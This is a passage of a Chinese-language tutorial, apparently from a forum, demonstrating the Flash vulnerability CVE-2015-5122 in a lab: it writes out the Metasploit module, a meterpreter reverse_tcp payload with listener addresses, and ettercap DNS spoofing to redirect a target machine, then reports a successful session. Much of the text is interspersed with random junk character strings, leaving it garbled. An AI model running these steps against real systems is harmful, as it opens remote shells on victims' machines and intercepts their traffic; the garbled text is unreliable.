|
7 Q. |% r! n1 `
二、cve2015-5122漏洞实例演示虚拟机 ( N$ c: `% S; X! t; q
: L! i5 g; Y6 q, c. A. |2 Z2 S+ _; q/ k; ], N9 ? {5 I+ R4 b8 ?. J! C0 O
关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
; ~" X( i" b2 w
' J' D7 d8 n9 C7 K! i2 m$ |# c; W' N3 |
search cve-2015-5122如图: 3 n3 s, J/ f+ e7 E" b: \
; `; Y( ^) T+ K
! ^2 B' X1 ^1 Q0 ~9 R- Q9 O
; H1 h: C% ]3 b$ F; ~# k0 j2 p 3 l% `0 n2 e/ H! b- ], c
- p+ O- |: Z0 p; n, f* T; Q# D: Z
下面我们敲如下命令:
" _1 b& A3 t. `2 u. j0 e . v+ t1 o J+ C3 l- H, g
! t! J, @0 p, \8 O$ d* X
use exploit/multi/browser/adobe_flash_opaque_background_uaf ; b6 p1 [3 I: K. W, _
: Q$ t _" G: b! V+ J/ r ^ l, ?! a
& ?: o9 J0 r; t: w' U5 w set PAYLOAD windows/meterpreter/reverse_tcp # ]! R2 L/ [( e
o9 X9 D7 H4 F; ?
, t# { c! Z8 g/ H& J: [; h) l* x set LHOST 192.168.0.109
: ~ _' N$ p/ f3 K$ R4 x) p; u - F: s* r' C( Z% f' b# z6 R
4 K. ^% w7 K' B* |1 S0 ?3 ^& b3 b% x
set URIPATH / /*根目录*/
% c1 S6 O5 W4 ~. p, `6 F
% E; T) e, k7 N6 u
$ o% `8 X: ^5 d: }# A% a8 G( } set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 $ g) x! y/ ^1 a
, [ \* Q/ v/ Q/ K# J) W# @3 n
# t* P0 G( G0 X! X/ Y
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 + p) t* Z% }; I/ G
0 D) O3 _. L- l) n2 M+ p
. v( D8 l- U' H+ A! V% ] 然后show options如图:
" s& K' J7 i+ `6 g, M
4 K# p& o8 \" ]- A/ j
, R* }4 {" b K: ~; F9 D : q0 v* B$ @! ^* G4 B3 ^" M
2 ~& G# _$ X O% k! u( l' l
" k9 O+ T/ O' I0 M2 a 一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
8 x; l7 D7 y* l
' @5 U6 U; [, P0 O% R
% r* q4 P/ ?( B$ k0 g+ ^% N. f7 F+ w* A! F7 V
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
; n# W: r3 A8 \ 0 |9 r N Q' H$ o& j' o: l0 k, j& G
, R, t* `4 ?& X* T! o. Q* \% @ Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
: E6 g! Y( _0 c! E# b: U: o
) F1 G- ~* q% E4 v5 b" _) i' I
+ t$ m% @# H0 a; i- f" k% E 9 c, T# H1 h3 Q L( L! L" Q
' w: A0 m5 B. c6 T- N
9 G+ F9 R; e w- p# O* W8 Z
成功了,这时候我们断开ettercap,如图:
# a% c5 \8 n& |* d4 E4 b( C/ b 2 ~4 e6 x+ X) x8 l7 B" _
8 q( V% M+ p: v) O8 I$ P
: d; _, _8 k; t u; q3 { $ m! K! Z( _1 ]' x! }" \8 p+ X8 |
' N0 d+ F/ o) g: }$ p Screenshot如图:
2 O: F3 }" ? [4 |$ G0 u, s , T6 H, f' h6 J C
" v7 I5 c) l) b5 l
; ]4 `3 ?2 [7 M
6 F3 U |3 }0 _$ k# z6 C0 G- F+ h0 P; }
9 i4 b v @5 x1 t( @' T |